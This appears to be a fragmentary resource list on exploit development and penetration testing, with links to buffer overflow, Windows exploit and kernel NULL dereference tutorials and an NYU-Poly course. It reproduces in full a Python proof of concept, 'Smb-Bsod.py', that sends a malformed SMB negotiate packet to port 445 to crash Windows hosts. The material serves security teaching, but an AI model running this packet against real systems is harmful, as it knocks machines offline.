Writing buffer overflow exploits - a tutorial for beginners
http://mixter.void.ru/exploit.html
ldd arbitrary code execution - good coders code, great reuse
http://www.catonmat.net/blog/ldd-arbitrary-code-execution/

use ldd to hack system

Windows Exploit Programming Primer Tutorial

Penetration Testing and Vulnerability Analysis

Innovative course at NYU-Poly that discusses Penetration Testing and Vulnerability Analysis . The course is split into six 2 week modules where an industry expert comes in and teachers a portion of the course. The website has all the course materials and even some of the lectures in video format.

Smb-Bsod.py: #!/usr/bin/python from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

This is why we do regression testing, folks!

WEEK 12 -- 04/14/2010

Much ado about NULL: Exploiting a kernel NULL dereference